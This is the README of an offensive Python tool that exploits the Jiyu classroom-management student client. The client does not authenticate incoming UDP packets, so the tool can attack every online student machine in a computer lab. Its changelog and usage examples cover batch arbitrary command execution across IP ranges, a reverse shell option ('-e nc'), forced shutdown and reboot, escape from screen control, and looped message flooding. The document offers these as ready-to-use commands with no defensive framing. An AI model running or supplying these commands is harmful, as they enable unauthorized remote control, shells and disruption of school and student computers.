Jiyu_udp_attack

• Because Jiyu’s student terminal does not perform (=・ω・=) authentication on the received UDP packet, we can construct a specific data packet for the student terminal to execute, thereby achieving command execution and attacking any online student in the computer room. terminal machine.

• Python3

v1.5

• Fix command execution bug

v1.4

• Code reconstruction, optimization of parameter selection logic
• Rebound shell function adds random port
• Update documentation

v1.3

• Disengage/restore screen control
• Support rebound shell

v1.2

• fix bug

v1.1

• The -g option supports obtaining the port that the student is listening on.

v1.0

• first submission

 usage:

    ------------------- Github Repositories -------------------
            https://github.com/ht0Ruial/Jiyu_udp_attack

       [-h] -ip IP [-p P] [-msg MSG] [-c C] [-l L] [-t T]
       [-e {r,s,g,nc,break,continue}]
       {r,s,g,nc,break,continue} ...

positional arguments:
  {r,s,g,nc,break,continue}
                        -e 参数的详细说明
    r                   reboot 重启
    s                   shutdown 关机
    g                   独立选项，获取当前的ip地址以及学生端监听的端口
    nc                  独立选项，反弹shell的机器需出网，退出可使用命令exit
    break               独立选项，脱离屏幕控制，需要管理员权限
    continue            独立选项，恢复屏幕控制

optional arguments:
  -h, --help            show this help message and exit
  -ip IP                ip 指定目标IP地址
  -p P                  port 指定监听端口，默认端口为4705
  -msg MSG              send_message发送消息 eg: -msg "HelloWord!"
  -c C                  command命令 eg: -c "cmd.exe /c ipconfig"
  -l L                  循环次数，默认为1
  -t T                  循环时间间隔，默认是22秒
  -e {r,s,g,nc,break,continue}
                        Extra Options加载额外的选项 eg：-e r
          

When using the -ip parameter to specify the target IP, you can specify it in the following ways:

• Specify a single IP, such as 192.168.80.12
• Specify the IP range, such as 192.168.80.10-56
• Specify segment C where the IP is located, such as 192.168.80.1/24

If the student-side listening port is not the default 4705 , you need to use the -p parameter to specify the port during subsequent operations.

 python Jiyu_udp_attack.py -e g

The current running permissions need to be administrator permissions, which are mainly used to start the MpsSvc service.

 python Jiyu_udp_attack.py -e break

 python Jiyu_udp_attack.py -e continue

If the student-side listening port is 4705 , send a message with the content "hello, baby!" to the machine with the IP address 192.168.80.12

 python Jiyu_udp_attack.py -ip 192.168.80.12 -msg "hello,baby!"

If the student-side listening port is 4605 , you need to use the -p parameter to specify the port and send a message with the content "hello, baby!" to the machine with the IP address 192.168.80.12.

 python Jiyu_udp_attack.py -ip 192.168.80.12 -p 4605 -msg "hello,baby!"

Play a calculator for 192.168.80.12 to 192.168.80.137

 python Jiyu_udp_attack.py -ip 192.168.80.12-137 -c calc.exe

When rebounding the shell, the IP can only be the IP of a certain machine and cannot be rebounded in batches. Moreover, the machine needs to go out of the network because batch execution of arbitrary commands has been implemented. Considering that batched rebounding is meaningless, it is not added.

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e nc

Shut down

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e s

Restart

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e r

Continuously send messages using a loop
The machine 1-254 will receive a "hello, baby!" message, and will continue to execute after 50 seconds, a total of 3 times.

    python Jiyu_udp_attack.py -ip 192.168.80.23/24 -msg "hello,baby!" -l 3 -t 50